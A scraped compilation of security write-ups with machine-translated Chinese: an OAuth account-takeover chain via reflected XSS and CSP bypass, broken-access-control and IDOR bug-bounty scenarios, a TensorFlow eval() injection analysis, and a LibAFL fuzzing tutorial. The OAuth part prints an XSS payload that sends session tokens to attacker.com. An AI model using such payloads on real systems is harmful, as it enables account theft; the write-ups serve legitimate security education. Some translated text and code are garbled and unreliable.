Exploiting OAuth: Journey to Account Takeover

利用 OAuth: 账户接管之旅

Published on 19 Nov 2021 2021年11月19日发表

Most of the web and mobile applications these days use OAuth to secure their authorization endpoints. It allows them to easily grant access to their users to particular resources as per the application’s requirements.

如今,大多数 web 和移动应用程序都使用 OAuth 来保护它们的授权端点。它允许它们根据应用程序的需求,轻松地授予用户对特定资源的访问权。

This is a write-up of a chain of vulnerabilities (OAuth Misconfiguration, CSRF, XSS, and Weak CSP) that allowed me to take over a user account using a single interaction.

这是一系列漏洞(OAuth 错误配置、 CSRF、 XSS 和 Weak CSP)的报道,它们允许我使用单个交互接管用户帐户。

This was a usual Project Management Web Application, using Microsoft’s OAuth 2.0 to authorize their users to allow them access to the application. Let’s call it – https://victim.com

这是一个通常的项目管理 Web 应用程序,使用微软的 OAuth 2.0授权他们的用户访问该应用程序。让我们称之为 https://victim.com

OAuth 2.0 Flow

2.0 Flow

An open protocol to allow secure authorization in a simple and standard method from web, mobile and desktop applications.


It is the industry-standard protocol for authorization. OAuth 2.0 focuses on client developer simplicity while providing specific authorization flows for web applications, desktop applications, mobile phones, and living room devices.

它是行业标准的授权协议。OAuth 2.0侧重于客户端开发者的简单性,同时为 web 应用程序、桌面应用程序、移动电话和起居室设备提供特定的授权流程。

OAuth 2.0 is an authorization protocol and NOT an authentication protocol. As such, it is designed primarily as a means of granting access to a set of resources, for example, remote APIs or user’s data.

OAuth 2.0是一个授权协议,而不是一个认证协议。因此,它主要被设计为授予对一组资源(例如,远程 api 或用户数据)的访问权的一种方式。

The authentication flow of the application was such that when a user visited the Application at https://victim.com, it redirected them to Microsoft’s Authorize endpoint at https://login.microsoftonline.com/<tenant-name>.onmicrosoft.com/oauth2/v2.0/authorize?p=<policy-name>

应用程序的身份验证流程是这样的,当用户访问 https://victim.com 的应用程序时,它会将用户重定向到微软授权端点的 https://login.microsoftonline.com/。Onmicrosoft.com/oauth2/v2.0/authorize?p= < 保单名称 >

This is where the users entered their Email Addresses and the Passwords to authenticate and after a successful OAuth flow, the user was returned to the application showing them the actual Dashboard.

这是用户输入他们的电子邮件地址和密码以进行身份验证的地方,在成功的 OAuth 流之后,用户被返回到应用程序,显示他们实际的 Dashboard。

The Attack


Whenever an OAuth authentication is being used, the first thought crossing the mind of an attacker is to check if the application validates the value of redirectUrl. This may lead to OAuth token stealing if the token is returned along with the callback request.

每当使用 OAuth 身份验证时,攻击者首先想到的就是检查应用程序是否验证了 redirectUrl 的值。如果随着回调请求一起返回令牌,这可能导致 OAuth 令牌窃取。

The initial request was
which redirected me to the Microsoft login page URL mentioned in the previous section.
So I tried to manipulate the redirectUrl and changed it with a server that I controlled to see if I receive the tokens but unfortunately, the application was not sending any of the tokens with the callback request which was weird.

最初的请求是微软 https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard ,它将我重定向到上一节提到的微软登录页面 URL。所以我尝试操作 redirectUrl,并用一个我控制的服务器修改它,看看我是否收到了令牌,但不幸的是,应用程序没有发送任何带有回调请求的令牌,这很奇怪。

On inspecting closely, it was observed that after returning from the OAuth flow, it sent a request to https://app.victim.com/auth/return containing the state and token values in the POST body.
The interesting part was the response as a result of this request. The response contained the actual tokens which the Application used. These tokens were being stored in the browser’s Session Storage using JavaScript as shown below –

在仔细检查时,观察到从 OAuth 流返回后,它向 https://app.victim.com/auth/return 发送一个请求,其中包含 POST 主体中的状态和令牌值。令人感兴趣的部分是对这个请求的响应。响应包含应用程序使用的实际标记。这些令牌使用 JavaScript 存储在浏览器的 Session Storage 中,如下所示


The page then redirected me to –
https://app.victim.com/dashboard using window.location.replace.

然后,页面使用 window.location.replace 将我重定向到- https://app.victim.com/dashboard。

This is the value from the redirectUrl parameter shown earlier in the initial request. Even though I was not able to get tokens by manipulating the redirectUrl, an attack could have still been possible if somehow the parameter was vulnerable to an XSS allowing me to directly read the tokens either from the source or from the session storage.

这是初始请求中前面显示的 redirectUrl 参数的值。即使我无法通过操作 redirectUrl 获得令牌,但是如果某个参数在 XSS 中易受攻击,允许我直接从源代码或会话存储中读取令牌,那么攻击仍然是可能的。

So I modified my payload to close the existing script tag to check if injecting scripts is possible or not. Here’s the URL that I used –
and the application graciously closed the script tag for me and reflected my HTML payload.

因此,我修改了我的有效负载来关闭现有的脚本标记,以检查是否可以注入脚本。下面是我使用的 URL- https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard /代码 </script > < h 1 > test </h 1 > ,应用程序优雅地为我关闭了脚本标记,并反映了我的 HTML 有效负载。

Closed Tag

From here, it was only one more step of data ex-filtration to my own server to steal the tokens and create a report.


But wait, there’s more. Now comes the part where I was stopped by the Content-Security-Policy. This is how their CSP looked when viewed on Google’s CSP Evaluator

但是等等,还有更多。现在是我被内容安全政策阻止的部分。这就是他们的 CSP 在谷歌的 CSP 评估器-上看起来的样子

Google CSP Evaluator

The unsafe-inline mostly does the trick in terms of inline script execution so that’s not an issue.
This could also have been bypassed using https://www.gstatic.com domain shown above because it hosts Angular Libraries. Here’s how that would have looked –

Unsafe-inline 在执行 inline 脚本方面基本上可以解决这个问题,所以这不是一个问题。这也可能是绕过使用 https://www.gstatic.com 域,因为它托管角图书馆上面所示。如果是这样的话,情况会是这样-


The thing that troubled me was the data ex-filtration because the connect-src directive only allowed certain domains to make connections to.
In simple terms, this means I can’t randomly make requests to my own server to receive the tokens.

让我感到困扰的是数据过滤,因为 connect-src 指令只允许某些域进行连接。简单地说,这意味着我不能随机向我自己的服务器发出接收令牌的请求。

The connect-src Content Security Policy (CSP) directive guards the several browsers mechanisms that can fetch HTTP Requests. This includes XMLHttpRequest (XHR / AJAX), WebSocket, fetch(), <a ping> or EventSource.

Connect-src Content Security Policy (CSP)指令保护了几种可以获取 HTTP 请求的浏览器机制。这包括 XMLHttpRequest (XHR/AJAX)、 WebSocket、 fetch ()、 < a ping > 或 EventSource。Https://content-security-policy.com/connect-src/

I tried frames and images as well but that didn’t work either because of frame-src and image-src attributes –

我尝试了帧和图像,但也没有工作,因为帧-src 和图像-src 属性-


If you are not allowed to connect to any external host, you can send data directly in the URL (query string) by redirecting the user to your web server. Here’s my final payload –

如果您不允许连接到任何外部主机,您可以通过重定向用户到您的 web 服务器,直接在 URL (查询字符串)中发送数据。这是我最后的有效载荷


https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard 文件 > </script > window.location =’http://attacker.com/’+document.getelementsbytagname(‘script’)文件 > </script >

In the above payload, I’ve used window.location to redirect the user’s browser to my server and along with the redirection, I’m attaching the tokens present in the page using document.getElementsByTagName('script')[0].outerText

在上面的有效负载中,我使用 window.location 将用户的浏览器重定向到我的服务器,在重定向的同时,我使用 document.getElementsByTagName (‘ script’)[0]附加了页面中的标记。outerText

And the final result is freshly generated Session Tokens received by my netcat listener

最终的结果是我的 netcat 侦听器接收到的新生成的 Session token




Since this is a combination of multiple vulnerabilities, here’s how it could have been mitigated –


  1. The initial vulnerability is introduced due to misconfiguration in implementing the OAuth flow’s redirectUrl parameter which is never validated. This was manipulated with ease which introduced the main bug.
  2. 初始漏洞是由于在实现 OAuth 流的 redirectUrl 参数时的错误配置引入的,这个参数从未被验证。这是易于操作的,引入了主要的错误。
  3. The endpoint lacked CSRF protection. Along with the URL validation, the endpoint should have implemented a CSRF validation. An extra state parameter that’s generated and validated when they initiate the authentication flow.
  4. 端点缺乏 CSRF 保护。在进行 URL 验证的同时,端点应该实现了 CSRF 验证。一个额外的状态参数,在他们启动身份验证流程时生成并验证。
  5. The XSS when setting the user tokens in the session storage. This allowed me to inject scripts to execute my payload. Great resource – OWASP XSS Prevention Cheat Sheet
  6. 在会话存储中设置用户令牌时的 XSS。这允许我注入脚本来执行我的有效负载。伟大的资源-OWASP 跨站预防备忘单
  7. Weak CSP Policy allowing unsafe-inline. Except for one very specific case, you should avoid using the unsafe-inline keyword in your CSP policy. As you might guess it is generally unsafe to use unsafe-inline. (Reference)
  8. 允许不安全内联的弱 CSP 策略。除了一个非常特殊的情况,您应该避免在 CSP 策略中使用 unsafe-inline 关键字。正如您可能猜测的那样,使用 unsafe-inline 通常是不安全的。(参考资料)



Broken Access Control: Pentester’s Gold Mine

破坏的访问控制: 彭特斯特的金矿

Hey folks, hope you all are doing well!
Recently OWASP Top 10 2021 was released and the Broken Access Control grabbed the first position with the most serious security risk. Broken Access Control issues are present when the restrictions imposed are only on the frontend and the backend APIs are never secured. Using the easily enumerable IDs is the root cause of Insecure Direct Object References (IDORs).

嘿,伙计们,希望你们都做得很好!最近,OWASP Top 102021发布,破坏访问控制以最严重的安全风险占据了第一位。如果限制仅限于前端,而后端 api 从未得到保护,则存在访问控制中断问题。使用易于枚举的 id 是不安全直接对象引用(Insecure Direct Object References,IDORs)的根源。

In this blog, I will be mostly focusing on my approach and scenarios which I encountered.


Broken Access Control 101


Broken Access Control in simple words means performing the actions outside the set of allowed permissions.


Whenever I test any application which has user roles, I ask myself the following questions:


  • What are the permissions of this user?


  • Is the user having permission to perform this action?


  • Can this user view this data?


  • What will be the business impact if the imposed access control can be broken?


Paisa hi paisa hoga, Broken Access Control, Bug Bounty Hunters, Bug Bounty memes, Phir Hera Pheri

Scenarios Encountered While Testing Applications for Broken Access Control


Let’s see some of the scenarios which I encountered.


Scenario 1 – IDOR in Password Vault

场景1-IDOR 在密码保险库中

The application was a password vault. The application allowed the user to store and update the usernames, passwords, ssh keys, and website URLs. When I was testing update account functionality, the application for the password field said: “Leave blank to keep current password”.

这个应用程序是一个密码库。这个应用程序允许用户存储和更新用户名、密码、 ssh 密钥和网站 url。当我测试更新帐户功能时,密码字段的应用程序说: “保留空白以保留当前密码”。

Broken Access Control, Blank Password, Insecure Direct Object Reference, Password vault

Seeing this I questioned myself: How is it binding the password to this account?

看到这个,我问自己: 怎么把密码绑定到这个账户?

After observing the POST request for saving the password I came to know that the application is linking the passwords using a credential_id.

在观察 POST 请求保存密码之后,我知道应用程序正在使用凭据 _ id 链接密码。

Broken Access Control, Credential ID, API, JSON

The post request made me curious. So, I meddled with the request by changing it to some other id. I was surprised to see that the account got updated; however, I wondered where I could see the updated passwords. I checked the application and pondered upon a button that tracks password history and showcases passwords to the users. I was shocked to see a password that was never mine! Hence, Insecure Direct Object Reference (IDOR) led me to enumerate the passwords of all accounts in the organization leading to a simple Broken Access Control issue.

这个职位的要求让我很好奇。因此,我通过将请求更改为其他 id 来干扰请求。我很惊讶地发现这个账户得到了更新; 但是,我想知道在哪里可以看到更新的密码。我检查了这个应用程序,然后思考了一个按钮,这个按钮可以跟踪密码历史记录并向用户展示密码。我很震惊地看到一个从来不是我的密码!因此,不安全的直接对象引用(Insecure Direct Object Reference,IDOR)使我枚举组织中所有帐户的密码,导致了一个简单的访问控制中断问题。

Scenario 2 – Breaking the Business Logic in Energy Tender Management Platform


In this scenario, the application was some sort of energy tender management platform. In this, the tender was to be approved by higher privileged users. The lower privileged users can only draft the tender and submit it to the Admin for approval. There was one business logic imposed in this application which is when any user is Editing the tender details, the other user cannot edit it. For example if the USER1 is editing the questionnaire the USER2 cannot. The tender is locked for this USER2. When the USER2 tried to open the tender for edit while the USER1 is editing, the application will give the following error message:

在这种情况下,应用程序是某种类型的能源投标管理平台。在这种情况下,投标将获得较高特权用户的批准。较低的特权用户只能草案的投标,并提交给管理员批准。这个应用程序中有一个业务逻辑,当任何用户编辑投标细节时,其他用户不能编辑它。例如,如果 user1正在编辑调查表,那么 user2就不能编辑。这个 user2的投标被锁定。当 user2试图在 user1编辑时打开标书进行编辑时,应用程序将给出以下错误消息:

Broken Access Control, Questionnaire Opened by other user, Business Logic

As per my assumption, the business logic behind the application is that when the Admin is approving the questionnaire, the lower privileged user must not edit it. Because when I tried updating the tender directly by making a PATCH request to the API. The API responded with the following message:

根据我的假设,应用程序背后的业务逻辑是,当 Admin 批准调查表时,低权限用户不能编辑它。因为当我尝试通过向 API 发出一个 PATCH 请求来直接更新投标时。这个 API 回应了以下信息:

Broken Access Control, Questionnaire locked, PUT method enabled, Allow header in response

While looking at the response, I discovered that the PUT method is allowed in this case. I changed the method to the PUT method and forwarded the request. To my surprise, the questionnaire got updated. So, by changing the method, I was able to bypass the imposed access control.

在查看响应时,我发现在这种情况下可以使用 PUT 方法。我将方法更改为 PUT 方法并转发请求。令我惊讶的是,调查问卷被更新了。因此,通过改变方法,我能够绕过强加的访问控制。

Scenario 3 – Pattern-based Shipment IDs

情景3——基于模式的装运 id

This application was for fleet management. This application segregates the companies into groups so that each company can view its shipments. The API request was in the following manner:



Here the id was in capital letters and eight characters long.

这里的 id 是大写字母和八个字符长。

Now, if we think of brute-forcing the same, it would have around 268 permutations. I dug a bit deeper to analyze if there is any pattern in the id, and it turned out that the first four characters were the first four letters of the name of the organization and the last four letters were random characters.

现在,如果我们考虑蛮力强迫同样的,它将有大约268种排列。我进一步分析了 id 中是否有任何模式,结果发现前四个字符是组织名称的前四个字母,后四个字母是随机字符。

So, for example, if the company’s name is TESTING Ltd, the id would be TESTxxxx, where x is any alphabet.

因此,举例来说,如果公司的名称是 TESTING Ltd,id 应该是 TESTxxxx,其中 x 是任何字母表。

Now the permutations are lowered down to 264. So by knowing the name of the company, I was able to brute force the rest of the characters and view their shipments. Analyzing the id made the permutations much lower and practically possible. It made the IDOR almost possible.

现在排列被降低到264。因此,通过知道公司的名称,我能够暴力破解其余的字符,并查看他们的出货量。分析 id 使排列变得更低,更实际。这使得 IDOR 几乎成为可能。

Scenario 4 – Using Database of Another User


Here the application was a project management platform. It allows users to upload databases. The user can also create projects in the application. While working on it, I observed that the dataset uploaded by the user could be associated with the project.


Broken Access Control, Attach Database, Project management platform

When I uploaded the dataset, the application responded with an integer as the dataset id. The application stores the dataset and assigns a sequential numerical integer as an id. With such IDs, there can be the possibility of IDOR.

当我上传数据集时,应用程序以一个整数作为数据集 id 响应。应用程序存储数据集并将一个顺序数字整数作为 id 分配。有了这样的 id,就有可能出现 IDOR。

Broken Access Control,Database id, Insecure Direct Object Reference

So, while creating the project, I observed that the application was passing a dataset. I changed it to the dataset of another user and successfully saved the project. Hence, I was able to attach the database of other users to my project.


Scenario 5 – Analyzing the Flow of Requests


In this case, the application was for entity and database management. It had a view-only user and an admin role. There were many vulnerable modules in this application. I was trying to perform all the CRUD operations from the view-only user’s session. The operation which grabbed my attention was DELETE. The application implemented a 2 step delete process:

在本例中,应用程序用于实体和数据库管理。它有一个只能查看的用户和一个管理员角色。这个应用程序中有许多易受攻击的模块。我试图从只有视图的用户会话中执行所有 CRUD 操作。引起我注意的操作是 DELETE。该应用程序实现了一个2步删除过程:

First, it sent a request to delete the endpoint, which redirected to confirm the delete endpoint, and the response also had some cookies.

首先,它发送了一个删除端点的请求,该端点被重定向以确认删除端点,响应也有一些 cookie。

Next, using these cookies, the application sent a request to confirm the delete endpoint and the entity deleted. There was no entity id present in the request. So, it was using the cookies assigned in step 1 identify the entity to be deleted.

接下来,使用这些 cookie,应用程序发送请求确认删除端点并删除实体。请求中没有实体 id。因此,它使用了步骤1中分配的 cookie 来标识要删除的实体。

Using the cookies of the View-only user, I first sent a request to the delete endpoint with the entity id to delete, copied the cookies obtained in the response, and sent a request to confirm the delete endpoint. By understanding the flow of requests in the application, I was able to break the access control imposed.

使用仅视图用户的 cookie,我首先向要删除的实体 id 的删除端点发送请求,复制在响应中获得的 cookie,然后发送请求确认删除端点。通过理解应用程序中的请求流,我能够打破强加的访问控制。

Key Takeaways


For Security Researchers:


  • Dig deeper into the application and understand the flow of requests.


  • Observe the requests closely and try to understand the significance of each parameter in the request.


  • If you are given more than 2 roles, don’t always focus on the least and the highest privileged roles. There can also be flaws in the access control roles with the mid-privileged roles.


  • Try to understand the application, use all the functionalities, and then focus on finding flaws in one functionality at a time. Dig as much as deep you can.


  • Reading the documentation of the application helps a lot in understanding the core logic and permission to various roles assisting you in discovering broken access control issues.


For Developers:


  • Whenever you are developing the application don’t impose access controls from the frontend only.


  • Impose Access control checks on the API endpoints too.

    对 API 端点也进行访问控制检查。

  • Always keep in mind to have server-side checks for the access control before committing the operation.


  • Use GUIDs for referencing the objects.

    使用 guid 来引用对象。

Once Sir Albert Einstein truly said :

阿尔伯特 · 爱因斯坦爵士曾经真诚地说过:

“If I had an hour to solve a problem and my life depended on the solution, I would spend the first 55 minutes determining the proper question to ask for once I know the proper question, I could solve the problem in less than five minutes.”


Questioning properly helps you analyze how the application behaves and come out with various unique test cases. There are misconfigurations at many places. Many times the access control is imposed only on frontend, so checking the APIs or POST request can reveal the issues.

正确的提问可以帮助您分析应用程序的行为,并得出各种独特的测试用例。在许多地方都存在错误的配置。很多时候,访问控制只施加在前端,因此检查 api 或 POST 请求可以揭示问题。

TensorFlow saved_model_cli 代码注入漏洞分析


saved_model_cli 主要功能是用来保存模型,这个程序在安装TF的时候就默认自带了,不知道有多少人用过它。


(base) [~] saved_model_cli run -h                                     21:24:46
usage: saved_model_cli run [-h] --dir DIR --tag_set TAG_SET --signature_def
                           SIGNATURE_DEF_KEY [--inputs INPUTS]
                           [--input_exprs INPUT_EXPRS]
                           [--input_examples INPUT_EXAMPLES] [--outdir OUTDIR]
                           [--overwrite] [--tf_debug] [--worker WORKER]

Usage example:
To run input tensors from files through a MetaGraphDef and save the output tensors to files:
$saved_model_cli show --dir /tmp/saved_model --tag_set serve \
--signature_def serving_default \
--inputs input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy \
--input_exprs 'input3_key=np.ones(2)' \
--input_examples 'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]' \



def preprocess_input_examples_arg_string(input_examples_str):
    input_dict = preprocess_input_exprs_arg_string(input_examples_str)


def preprocess_input_exprs_arg_string(input_exprs_str):
    input_dict = {}

for input_raw in filter(bool, input_exprs_str.split(';')):
        input_key, expr = input_raw.split('=', 1)
       # ast.literal_eval does not work with numpy expressions
      input_dict[input_key] = eval(expr)  # pylint: disable=eval-used
return input_dict


这个漏洞在TensorFlow 2.7.0版本被修复,CVE号为CVE-2021-41228。





Fuzzing101 with LibAFL – 第 IV 部分:第 I 部分的速度改进

链接: https://epi052.gitlab.io/notes-to-self/blog/2021-11-07-fuzzing-101-with-libafl-part-1.5/

Twitter 用户安东尼奥·莫拉莱斯 (Antonio Morales)于 2021 年 8 月创建了Fuzzing101存储库。在该存储库中,他创建了练习和解决方案,旨在向想要学习如何在实际软件项目中查找漏洞的任何人教授模糊测试的基础知识。该 repo 侧重于AFL++ 的使用,但本系列文章旨在解决使用LibAFL的练习。我们将探索库并在 Rust 中编写模糊器,以便以与建议的 AFL++ 用法紧密结合的方式解决挑战。

由于本系列将着眼于 Rust 源代码和构建模糊器,为简洁起见,我将假设在这两个领域都有一定的知识水平。如果您需要简要介绍/复习/关于覆盖率引导的模糊测试,请查看此处。与往常一样,如果您有任何疑问,请随时与我们联系。

这篇文章将介绍一些提高本系列第一部分模糊器速度的方法。本练习的配套代码可以在我的fuzzing-101-solutions 存储库中找到

以前的帖子: –第一部分:模糊测试 Xpdf



  "Fuzzer": {
    "type": "StdFuzzer",
    "Corpora": {
      "Input": "InMemoryCorpus",
      "Output": "OnDiskCorpus"
    "Input": "BytesInput",
    "Observers": [
    "Feedbacks": {
      "Pure": ["MaxMapFeedback", "TimeFeedback"],
      "Objectives": ["MapFeedbackState", "TimeoutFeedback"]
    "State": "StdState",
    "Monitor": "MultiMonitor",
    "EventManager": "LlmpRestartingEventManager",
    "Scheduler": "IndexesLenTimeMinimizerCorpusScheduler",
    "Executor": "TimeoutExecutor<InProcessExecutor>",
    "Mutators": ["havoc_mutations"],
    "Stages": ["StdMutationalStage"]



如果你想在 fuzzing 过程中非常快,你通常需要进程内执行器而不是 forkserver

对于第一篇文章,我想让事情相对简单。在我看来,与进程内执行的工作方式相比,一个进程在孩提时代执行另一个进程要容易一些,尤其是当您不熟悉所有这些模糊测试时。此外,除非您启用持久模式(这是“进程内执行程序”的另一种说法),否则 afl++ 将使用 forkserver。

在@domenuk 提出建议之前,我已经在考虑撰写关于提高第 1 部分模糊器性能的文章,但他的评论决定了我的命运。所以,我们开始了,我们将通过以下方式来提高我们的第一个模糊器的性能:

  • 换出afl-clang-fastafl-clang-lto编译过程中
  • 通过共享内存而不是通过磁盘上的文件将输入传递给程序
  • 实现进程内执行程序而不是 forkserver


第 1 步:编译器交换

本节将处理使用afl-clang-lto而不是afl-clang-fast. 但为什么?我很高兴你问了!以下是afl-clang-lto 上afl++ 文档中TL;DR 的摘录:

  • 使用 afl-clang-lto/afl-clang-lto++,因为它比 AFL 世界中的其他任何东西都更快并且提供更好的覆盖范围
  • 您可以将它与 llvm_mode: laf-intel 和仪器文件列表功能一起使用,并且可以与 cmplog/Redqueen 结合使用

如果您不熟悉向 fuzzer 添加字典,这里是同一文档的另一个摘录:

AUTODICTIONARY 功能:在编译时,会自动生成基于字符串比较的字典并将其放入目标二进制文件中。这本词典在启动时转移到 afl-fuzz。这将统计覆盖率提高了 5-10%

因此,通过切换到afl-clang-lto,我们获得了更快的模糊器,并增加了代码覆盖率。如果您需要更多的说服力,这也是afl++ 文档所说的使用,如果您的系统和目标支持它。



目前,构建脚本用于afl-clang-fast检测 Xpdf,因此我们将开始在那里进行更改。我们不只是更换编译器,而是构建两个 Xpdf,这样我们就可以对两者进行比较,看看我们的更改是否提高了速度。

如果你阅读本系列第一篇文章,你可能还记得,我们的构建脚本将执行我们的configuremakemake install步骤建立的xpdf。我们要做的就是执行这些步骤两次,每个编译器执行一次。然后我们将构建存储在单独的文件夹 ( built-with-(lto|fast)) 中。

for (build_dir, compiler) in [("fast", "afl-clang-fast"), ("lto", "afl-clang-lto")] {
    // configure with `compiler` and set install directory to ./xpdf/built-with-`build_dir`
        .arg(&format!("--prefix={}/built-with-{}", xpdf_dir, build_dir))
        .env("CC", format!("/usr/local/bin/{}", compiler))
        .env("CXX", format!("/usr/local/bin/{}++", compiler))
            "Couldn't configure xpdf to build using afl-clang-{}",

    // make && make install
        .expect("Couldn't make xpdf");

        .expect("Couldn't install xpdf");

我们还需要更新我们的make clean命令来处理新的构建目录。

// clean doesn't know about the built-with-* directories we use to build, remove them as well
    .arg(&format!("{}/built-with-lto", xpdf_dir))
    .arg(&format!("{}/built-with-fast", xpdf_dir))
    .expect("Couldn't clean xpdf's built-with-* directories");



接下来让我们跳到 fuzzer 的源代码。在其中,我们可以看到在第一部分中,我们将路径硬编码pdftotext到我们的 ForkserverExecutor 中。

let fork_server = ForkserverExecutor::new(
    format!("./xpdf/install/bin/pdftotext", compiler),

由于我们正在编译 的两个版本pdftotext,如果我们可以在不重新编译模糊器的情况下在它们之间切换会更酷。为了让这个梦想成为现实,让我们添加一个命令行选项来控制 pdftotext 的路径。

即使我们在 main.rs 部分,我们也需要添加 [clap crate]() 作为依赖项,所以让我们快速绕道而行。

练习 1/Cargo.toml

libafl = {version = "0.6.1"}
clap = "3.0.0-beta.5"

好的,回到 main.rs;让我们编写一个快速函数,该函数将解析ltofast从命令行解析,并将选择作为String.

use clap::{App, Arg};


/// parse -c/--compiler from cli; return "fast" or "lto"
fn get_compiler_from_cli() -> String {
    let matches = App::new("fuzzer")
                .possible_values(&["fast", "lto"])
                .about("choose your afl-clang variant (default: fast)")


编写函数后,我们可以从 调用它main,并更新 ForkserverExecutor 中的路径。

fn main() {
    let compiler = get_compiler_from_cli();

    // Component: Corpus
    let fork_server = ForkserverExecutor::new(
        format!("./xpdf/built-with-{}/bin/pdftotext", compiler),
        // we're passing testcases via on-disk file; set to use_shmem_testcase to false
        tuple_list!(edges_observer, time_observer),



为了查看我们的更改是否产生任何影响,我们需要进行某种比较。我们可以编写一个快速的 shell 脚本来执行以下操作

  • 在给定的超时时间内运行每个模糊器几次
  • 对于每次运行,记下执行的总数
  • 将执行次数除以超时
  • 平均所有的运行在一起
  • 吐出结果


练习 1/time-comparison.sh


function exec-fuzzer() {
  # parameters:
  #   fuzzer: should be either "lto" or "fast"
  #   timeout: in seconds
  #   cpu: which core to bind, default is 7
  declare -i cpu="${3}" || 7
  # last_update should look like this
  # [Stats #0] clients: 1, corpus: 425, objectives: 0, executions: 23597, exec/sec: 1511
  last_update=$(timeout "${timeout}" taskset -c "${cpu}" ../target/release/exercise-one-solution -c "${fuzzer}" | grep Stats | tail -1)

  # regex + cut below will return the total # of executions
  total_execs=$(echo $last_update | egrep -o "executions: ([0-9]+)" | cut -f2 -d' ')

  echo $execs_per_sec

function average_of_five_runs() {
  # parameters:
  #   fuzzer: should be either "lto" or "fast"
  declare -i total_execs_per_sec=0
  declare -i total_runs=5

  for i in $(seq 1 "${total_runs}");
    current=$(exec-fuzzer "${fuzzer}" "${timeout}")
    echo "[${fuzzer}][${i}] - ${current} execs/sec"

  echo "[${fuzzer}][avg] - ${final} execs/sec"

average_of_five_runs fast
average_of_five_runs lto




[fast][1] - 1129 execs/sec
[fast][2] - 970 execs/sec
[fast][3] - 1050 execs/sec
[fast][4] - 1112 execs/sec
[fast][5] - 1096 execs/sec
[fast][avg] - 1071 execs/sec
[lto][1] - 1016 execs/sec
[lto][2] - 1246 execs/sec
[lto][3] - 1151 execs/sec
[lto][4] - 1208 execs/sec
[lto][5] - 1217 execs/sec
[lto][avg] - 1167 execs/sec

我们可以看到,在五次运行过程中,lto 模糊器​​的速度提高了约 9%!它可能看起来不多,但这是一个大问题。我们会将其视为胜利并继续进行下一个改进。


  • 从语料库中获取测试用例
  • 变异测试用例
  • 将变异的测试用例写入磁盘 (.cur_input)
  • fork/exec 新子进程 (./pdftotext ./.cur_input)
    • 孩子从磁盘读取 .cur_input
  • 重复

我们实现共享内存模糊测试的目标是删除对磁盘的读取和写入。相反,我们的测试用例将从 InMemoryCorpus 中提取,在内存中进行变异,并通过pdftotext共享内存映射传递到模糊目标 ( )。这个过程并不难,因为 afl 包含了一些有用的宏来帮助完成这项任务。归结为在源代码中找到我们可以插入以下宏的可能位置。

__AFL_FUZZ_INIT();  // after #includes, before main
// typically in main
unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;

AFL ++文档说共享存储器起毛后观察到的通常的速度增加加入通常约为2倍的性能提升。让我们看看我们是否能达到这个目标。


我们将首先修改我们的 fuzzer,因为这是我们需要为此改进所做的最简单的更改。我们真正需要做的就是将 ForkserverExecutor 的use_shmem_testcase参数从 false更新为 true,然后删除pdftotext@@参数。

let fork_server = ForkserverExecutor::new(
    format!("./xpdf/built-with-{}/bin/pdftotext", compiler),
    // we're passing testcases via shmem; set to use_shmem_testcase to true
    tuple_list!(edges_observer, time_observer),


调查 Xpdf

为了让我们的 fuzzer 进入共享内存的未来,我们需要修改一些 Xpdf 源代码。我们在这里所做的修改一定是针对 Xpdf 的,但对于其他模糊目标,一般步骤应该是相同的。我们的首要任务是读取源代码,以找出我们的输入文件是如何解析的以及在何处解析的。目标是用unsigned *char buf我们之前看到的宏替换文件读取逻辑。

我们将开始打猎 inpdftotext.cc的主要功能。main 函数首先声明变量,解析命令行值,并通过配置文件设置其全局状态。这些对我们来说都不是很有趣(现在),但是在初始设置之后,我们会看到PDFDoc创建的位置。


int main(int argc, char *argv[]) {
  PDFDoc *doc;
  GString *fileName;
  doc = new PDFDoc(fileName, ownerPW, userPW);

fileName变量被传递到 PDFDoc 构造函数中,因此从磁盘读取文件很可能发生在 PDFDoc 代码中的某处。

在这里我们看到了 PDFDoc 构造函数 PDFDoc.h


class PDFDoc {

  PDFDoc(GString *fileNameA, GString *ownerPassword = NULL,
	  GString *userPassword = NULL, void *guiDataA = NULL);

以及在 PDFDoc.cc


PDFDoc::PDFDoc(GString *fileNameA, GString *ownerPassword,
	       GString *userPassword, void *guiDataA) {
  Object obj;
  GString *fileName1, *fileName2;
  fileName = fileNameA;
  fileName1 = fileName;
  if (!(file = fopen(fileName1->getCString(), "rb"))) {
  // create stream
  str = new FileStream(file, 0, gFalse, 0, &obj);

  ok = setup(ownerPassword, userPassword);

在实现中,我们可以一直跟踪fileNameA参数到FileStream构造函数。那个面包屑引导我们到Stream.cc. 对我们来说不幸的是,FileStream 是一个用户定义的类,它包装了 IO 流相关的功能。它unsigned char不像我们需要设置上面讨论的宏那样使用数组。



MemStream::MemStream(char *bufA, Guint startA, Guint lengthA, Object *dictA):
    BaseStream(dictA) {
  buf = bufA;
  start = startA;
  length = lengthA;
  bufEnd = buf + start + length;
  bufPtr = buf + start;
  needFree = gFalse;

我们也很幸运地发现 MemStream 具有与 FileStream 相同的 API,这使其成为替代品。我们需要做的就是用 MemStream 构造函数替换 PDFDoc 中的 FileStream 构造函数,我们应该很高兴。让我们开始吧!


随着分析的进行,不需要太多的改动。首先,我们需要添加一个包含,unistd因为其中一个宏最终需要它。当我们接近文件顶部时,我们还可以__AFL_FUZZ_INIT在 #includes 下方和 PDFDoc 构造函数上方插入宏。

#include <unistd.h>
#define headerSearchSize 1024	// read this many bytes at beginning of
				//   file to look for '%PDF'


// PDFDoc

PDFDoc::PDFDoc(GString *fileNameA, GString *ownerPassword,
	       GString *userPassword, void *guiDataA) {

完成后,我们可以更改构造函数以使用 MemStream。此外,还有一堆与编写输出文件相关的代码(我们没有使用,但无论如何都会被默认情况触发),所以我们将继续并删除它。去除输出文件代码后,整个构造函数如下所示。

PDFDoc::PDFDoc(GString *fileNameA, GString *ownerPassword,
	       GString *userPassword, void *guiDataA) {
  Object obj;
  GString *fileName1, *fileName2;

  ok = gFalse;
  errCode = errNone;

  guiData = guiDataA;

  file = NULL;
  str = NULL;
  xref = NULL;
  catalog = NULL;
  outline = NULL;

  unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
  int len = __AFL_FUZZ_TESTCASE_LEN;

  // create stream

  str = new MemStream((char *) buf, 0, (Guint) len, &obj);
  ok = setup(ownerPassword, userPassword);




  exitCode = 99;

  // parse args
  ok = parseArgs(argDesc, &argc, argv);
